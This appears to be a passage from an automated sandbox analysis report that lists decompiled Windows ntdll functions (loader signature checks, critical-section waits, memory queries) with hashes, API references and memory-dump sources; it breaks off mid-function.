Opcode ID: cc681773bbe07575a5a91e8c66c2d2c6ec3510cf89511280d5f8e5540cf8524f
Instruction ID: 0d68c88282c1513d6022f6dd8a6b40b014ced846b69cc6c8e24500b864995775
Opcode Fuzzy Hash: cc681773bbe07575a5a91e8c66c2d2c6ec3510cf89511280d5f8e5540cf8524f
Instruction Fuzzy Hash: 4131F47AD00A09AFDB15DE58C945E6BF778EB80B20F01416AE914AF350D7309E10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0342176C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
nativeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0342176C(signed int __ecx) {
				void* _v8;
				char* _v12;
				short _v14;
				char _v16;
				signed int _v24;
				void* _v28;
				int _v32;
				int _v36;
				int _v40;
				char* _v44;
				int _v48;
				char _v52;
				short _t22;
				short _t23;
				void* _t27;
				long _t29;
				signed int _t38;

				_t22 = 0x46;
				_v16 = _t22;
				_t23 = 0x48;
				_v14 = _t23;
				_t38 = __ecx;
				_v12 = L"\\KernelObjects\\SystemErrorPortReady";
				_v44 =  &_v16;
				_push( &_v52);
				_push(0x100001);
				_v52 = 0x18;
				_push( &_v8);
				_v48 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_t27 = E033D9900();
				if(_t27 >= 0) {
					if(__ecx != 0xffffffff) {
						_v28 = __ecx * 0xffffd8f0;
						_v24 = __ecx * 0xffffd8f0 >> 0x20;
					}
					asm("sbb esi, esi");
					_t29 = NtWaitForSingleObject(_v8, 0,  ~(_t38 + 1) &  &_v28);
					NtClose(_v8);
					return _t29;
				}
				return _t27;
			}

0x03421778
0x0342177b
0x03421781
0x03421782
0x03421786
0x0342178b
0x03421792
0x03421798
0x03421799
0x034217a1
0x034217a8
0x034217a9
0x034217ac
0x034217af
0x034217b2
0x034217b5
0x034217bc
0x034217c1
0x034217cc
0x034217cf
0x034217cf
0x034217d8
0x034217e1
0x034217eb
0x00000000
0x034217f0
0x034217f7

APIs

NtWaitForSingleObject.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 034217E1
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000568,00000568,00100001,?,?,00000000), ref: 034217EB

Strings

\KernelObjects\SystemErrorPortReady, xrefs: 0342178B

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001Object.0000001SingleWait
String ID: \KernelObjects\SystemErrorPortReady
API String ID: 3349210030-2278496901
Opcode ID: 58ee195b18074ef47fbaac18042e193857fe716cdb9bee915e368bae67c76dad
Instruction ID: 4e659483bd1637760f8bec6de8f2a7d6b3d56d090efb651320b75e2c79f0b328
Opcode Fuzzy Hash: 58ee195b18074ef47fbaac18042e193857fe716cdb9bee915e368bae67c76dad
Instruction Fuzzy Hash: D0115676D1022CAACB10DFA99845ADEFBF8EF85710F10426BE914F7250E7705A05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 003531DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0033250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00353362
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 003534BF
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 003534D6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 51d45d013974bd65e909c26f205cd1cfa0ad40c36f04d434dfcbfc889294f7c2
Instruction ID: a8177daec606fc332a61a3e9876accba9d71f0d5c287b94d48797febcfbaecee
Opcode Fuzzy Hash: 51d45d013974bd65e909c26f205cd1cfa0ad40c36f04d434dfcbfc889294f7c2
Instruction Fuzzy Hash: 2191E6357042018BC726DF29C89196BB3E6EF98385F46892DED45CB360EB31DE49C791

Uniqueness

Uniqueness Score: -1.00%

Function 0342C450, Relevance: 4.6, APIs: 3, Instructions: 53
nativeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0342C450(void** _a4) {
				signed char _t25;
				void** _t26;
				void** _t27;

				_t26 = _a4;
				_t25 = _t26[4];
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push(_t26[2]);
					_push(0);
					_push( *_t26);
					E033D9910();
					_t25 = _t26[4];
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 =  &(_t26[1]); // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E033D95B0();
					if( *_t27 != 0) {
						NtClose( *_t27);
					}
				}
				_t8 =  &(_t26[5]); // 0x14
				if(_t26[2] != _t8) {
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26[2]);
				}
				NtClose( *_t26);
				return L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0342c458
0x0342c45d
0x0342c466
0x0342c468
0x0342c469
0x0342c46a
0x0342c46b
0x0342c46e
0x0342c46f
0x0342c471
0x0342c476
0x0342c476
0x0342c47c
0x0342c47e
0x0342c480
0x0342c480
0x0342c483
0x0342c484
0x0342c486
0x0342c488
0x0342c48f
0x0342c493
0x0342c493
0x0342c48f
0x0342c498
0x0342c49e
0x0342c4ad
0x0342c4ad
0x0342c4b4
0x0342c4cd

APIs

NtAdjustPrivilegesToken.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00800000,?,033F9A59,?,?,0337119C,00000001), ref: 0342C471

Part of subcall function 033D9910: LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D991A

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000004,000000FE,00000005,00000004,00000004,?,00000000,00800000,?,033F9A59,?,?,0337119C,00000001,?,00000000), ref: 0342C493
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,?,00000000,00800000,?,033F9A59,?,?,0337119C,00000001,?,00000000,?,?,033A7F7A), ref: 0342C4B4

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001$Close.0000001$AdjustInitializePrivilegesThunk.0000001Token.0000001
String ID:
API String ID: 3335511809-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: d5fbc38f1cdd2715eaf01f39e57671b7f6030b99bd8fdaa449e61fe94009c588
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 8001CC76180605BFD621EF25CCC0EA7FB6EFF84390F444126F2145A660CB22ACA1CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 033A7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E033A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E033ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0339C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3485780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03415510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3485780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E033B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E033B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03417016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E033B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E033B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03417016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E033CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0339B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x033a7e4c
0x033a7e50
0x033a7e55
0x033a7e58
0x033a7e5d
0x033a7e71
0x033a7f33
0x033a7e77
0x033a7e77
0x033a7e79
0x033a7e79
0x033a7e7e
0x033a7f45
0x033f9848
0x00000000
0x033f9848
0x033a7f4e
0x033a7f53
0x033a7f5a
0x00000000
0x00000000
0x033f985a
0x033f9862
0x033f9866
0x00000000
0x033f986c
0x00000000
0x033f986c
0x033a7e84
0x033a7e84
0x033a7e8d
0x033f9871
0x033a7eb8
0x033a7ec0
0x033a7ec0
0x033a7e9a
0x033f987e
0x00000000
0x00000000
0x033f9884
0x033f988b
0x033f98a7
0x033f98ac
0x033f98b1
0x033f98b6
0x033f98b8
0x033f98b8
0x033f98b9
0x00000000
0x033f98b9
0x033a7ea0
0x033a7ea7
0x00000000
0x00000000
0x033a7eac
0x033a7eb1
0x033a7ec6
0x033a7ed0
0x033f98cc
0x033a7ed6
0x033a7ed6
0x033a7ed6
0x033a7ede
0x033a7ee3
0x033f98e3
0x033f98f0
0x033f9902
0x033f98f2
0x033f98fb
0x033f98fb
0x033f9907
0x033f991d
0x033f991d
0x033f9907
0x033f98e3
0x033a7ef0
0x033a7f14
0x033a7f14
0x033a7f1e
0x033f9946
0x033a7f24
0x033a7f24
0x033a7f24
0x033a7f2c
0x033f996a
0x033f9975
0x033f9975
0x033f997e
0x033f9993
0x033f9993
0x033f997e
0x00000000
0x033a7ef2
0x033a7efc
0x033a7f0a
0x033a7f0e
0x033f9933
0x00000000
0x033f9933
0x00000000
0x033a7f0e
0x00000000
0x00000000
0x00000000
0x033a7eb1

Strings

LdrpCompleteMapModule, xrefs: 033F9898
minkernel\ntdll\ldrmap.c, xrefs: 033F98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 033F9891

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: dd412fe5eb0f44756e6f1f9f7910387510ecaeb2ffc3baeb35d7e7b7575039b8
Instruction ID: da58a00a562cf260720a2c3f5512a0aba03605dc53bb7e3d6b98e2d92ca315ad
Opcode Fuzzy Hash: dd412fe5eb0f44756e6f1f9f7910387510ecaeb2ffc3baeb35d7e7b7575039b8
Instruction Fuzzy Hash: 8851CF31A00B849FEB21CBACCDC4F6ABBE8EB41354F480699E9519B6A1D734ED00C791

Uniqueness

Uniqueness Score: -1.00%

Function 03392D8A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E03392D8A(void* __ebx, signed char __ecx, struct _GUID __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				struct _GUID _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v60;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				struct _GUID _t57;
				signed int _t58;
				char* _t62;
				long _t63;
				long _t64;
				void* _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				struct _GUID _t88;
				intOrPtr _t89;
				signed char _t93;
				struct _GUID _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				void* _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3485350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3487bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E033D97C0();
				}
				if( *0x34879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x34879c8;
				}
				_v16 = _t57;
				if( *(_t109 + 0x10) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E033C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *(_t109 + 0x10);
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E033B7D50() != 0) {
						_t62 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags =  *(_t63 + 0x240) & 0x00000002;
						if(( *(_t63 + 0x240) & 0x00000002) != 0) {
							_t93 = _t109;
							E0342FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_t64 = NtWaitForSingleObject(_t104, 0, _t88);
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E033CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E033EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3486901;
								_push(_t109);
								_v60 = _t98;
								if( *0x3486901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E033D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										NtClose(_v12);
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E033B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags =  *(_t64 + 0x240) & 0x00000004;
										if(( *(_t64 + 0x240) & 0x00000004) != 0) {
											_t78 = E033B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03417016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0342FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3485350;
							if(_t109 != 0x3485350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0342FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03425720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x03392d8a
0x03392d8a
0x03392d92
0x03392d96
0x03392d9e
0x03392da0
0x03392da3
0x03392da5
0x03392da8
0x03392dab
0x03392db2
0x033ef9aa
0x033ef9ab
0x033ef9ae
0x033ef9ae
0x03392db8
0x03392dc2
0x033ef9b9
0x033ef9be
0x033ef9bf
0x033ef9bf
0x03392dcf
0x033ef9c9
0x03392dd5
0x03392dd5
0x03392dd5
0x03392dde
0x03392de1
0x03392e70
0x03392e72
0x03392e72
0x03392de7
0x03392deb
0x03392e7c
0x03392e83
0x03392e85
0x03392e8b
0x03392e8d
0x03392e92
0x03392e92
0x03392e85
0x03392df1
0x03392df7
0x03392df9
0x03392df9
0x03392dfc
0x03392dff
0x03392e02
0x00000000
0x03392e05
0x03392e0c
0x033ef9d9
0x03392e12
0x03392e12
0x03392e12
0x03392e1a
0x033ef9e3
0x033ef9e9
0x033ef9f0
0x033ef9f6
0x033ef9f8
0x033ef9f8
0x033ef9f0
0x03392e23
0x033efa06
0x00000000
0x03392e29
0x03392e29
0x03392e2e
0x03392e34
0x03392e3e
0x00000000
0x00000000
0x03392e44
0x03392e47
0x03392e4d
0x00000000
0x00000000
0x03392e4f
0x03392e54
0x00000000
0x00000000
0x03392e5a
0x03392e5f
0x03392e9a
0x03392ea4
0x03392ea5
0x03392ea8
0x03392eaf
0x03392eb2
0x03392eb5
0x033efae9
0x033efaeb
0x033efaed
0x033efaef
0x033efaf7
0x033efaf8
0x033efafd
0x033efaff
0x033efb04
0x033efb04
0x033efaff
0x03392ec0
0x03392ec4
0x03392ec6
0x03392ec8
0x033efb14
0x033efb18
0x033efb21
0x033efb21
0x03392ece
0x03392ece
0x03392ece
0x03392ed7
0x03392e61
0x03392e63
0x033efa6b
0x033efa71
0x033efa76
0x033efa78
0x033efa8a
0x033efa7a
0x033efa83
0x033efa83
0x033efa8f
0x033efa91
0x033efa97
0x033efa9d
0x033efaa4
0x033efaaa
0x033efaaf
0x033efab1
0x033efac3
0x033efab3
0x033efabc
0x033efabc
0x033efac8
0x033efacb
0x033efadf
0x033efadf
0x033efacb
0x033efaa4
0x033efa91
0x03392e6f
0x03392e6f
0x03392e5f
0x033efa13
0x033efa15
0x033efa17
0x033efa1f
0x033efa21
0x033efa22
0x033efa25
0x033efa28
0x033efa2f
0x033efa2f
0x033efa2a
0x033efa2a
0x033efa2a
0x033efa31
0x033efa34
0x033efa36
0x033efa3c
0x033efa3e
0x033efa41
0x033efa43
0x033efa45
0x033efa45
0x033efa41
0x033efa3c
0x033efa4a
0x033efa4f
0x033efa51
0x033efa53
0x033efa56
0x033efa5b
0x033efa5e
0x00000000
0x033efa5e
0x03392e23

Strings

RTL: Re-Waiting, xrefs: 033EFA4A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 889203aeaed66f2890162e4e0ec92e9d1e00f5ee73fd37bed2aa45aebcf5ea0a
Instruction ID: d3847181bbdc092fefe09929acdb6743bfce37e8cf272faaa11bb8fe9afd39e0
Opcode Fuzzy Hash: 889203aeaed66f2890162e4e0ec92e9d1e00f5ee73fd37bed2aa45aebcf5ea0a
Instruction Fuzzy Hash: AB61F671E00A58EFEB21DF68CCC0B7EB7A9EB44714F190A9AE451DF6D0C77499018B91

Uniqueness

Uniqueness Score: -1.00%

Function 03460EA5, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
nativeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E03460EA5(void* __ecx, void* __edx) {
				void _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				signed char _t62;
				char* _t67;
				char* _t69;
				long _t80;
				void* _t83;
				void* _t93;
				intOrPtr _t115;
				long* _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0345FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03461074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *(__ecx + 0x3c);
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_t80 = NtQueryVirtualMemory(0xffffffff, _t93, 3,  &_v24, 0x14, 0);
					_t115 = _v60;
					if(_t80 < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t115) {
						_push(_t93);
						E0345A80D(_t115, 1, _v40, _t117);
						_t83 = 4;
					}
				}
				if(E0345A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3488b04 >> 0x14) + (_v44 -  *0x3488b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E033B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0345138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E033B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0344FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3488724 & 0x00000008) != 0) {
						E034552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E034615B5(0x3488ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x03460eb7
0x03460eb9
0x03460ec0
0x03460ec2
0x03460ecd
0x0346105b
0x0346105b
0x03461061
0x03461066
0x03461066
0x0346106b
0x03461073
0x03461073
0x03460ed3
0x03460ed6
0x03460edc
0x03460ee0
0x03460ee7
0x03460ef0
0x03460ef5
0x03460efa
0x03460f09
0x03460f0e
0x03460f14
0x03460f23
0x03460f2d
0x03460f34
0x03460f34
0x03460f14
0x03460f52
0x00000000
0x00000000
0x03460f58
0x03460f73
0x03460f74
0x03460f79
0x03460f7d
0x03460f80
0x03460f86
0x03460fab
0x03460fb5
0x03460fc6
0x03460fd1
0x03460fe3
0x03460fd3
0x03460fdc
0x03460fdc
0x03460feb
0x03461009
0x03461009
0x03461015
0x03461027
0x03461017
0x03461020
0x03461020
0x0346102f
0x0346103c
0x0346103c
0x03461048
0x03461050
0x03461050
0x03461055
0x00000000
0x03461055
0x03460f88
0x03460f9e
0x03460fa2
0x03460fa9
0x00000000
0x00000000
0x00000000
0x03460fa9
0x00000000

APIs

Part of subcall function 0345FF69: NtQueryVirtualMemory.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,00000000,00000003,?,00000014,00000000,00000000,?,00000000,?,?,?,?,?,03460ECB,?), ref: 0345FFAC

NtQueryVirtualMemory.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,00000000,00000003,?,00000014,00000000,?,00000000,?,?), ref: 03460F09

Strings

`, xrefs: 03460F16

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Memory.0000001QueryVirtual
String ID: `
API String ID: 56184443-2679148245
Opcode ID: ef6f2a40630a3628aba408991909881dd5aa61a5847e2b28962f1b6be44d41ff
Instruction ID: e7a1859f8b7c7d902725982ab050ec3f4e33c375f59f8859c31d2e5f378f58fe
Opcode Fuzzy Hash: ef6f2a40630a3628aba408991909881dd5aa61a5847e2b28962f1b6be44d41ff
Instruction Fuzzy Hash: 4D51DF712087419FD724DF29D980B1BB7E9EBC4304F08092EF9969F691D770E805CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 033CD294, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E033CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x348d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
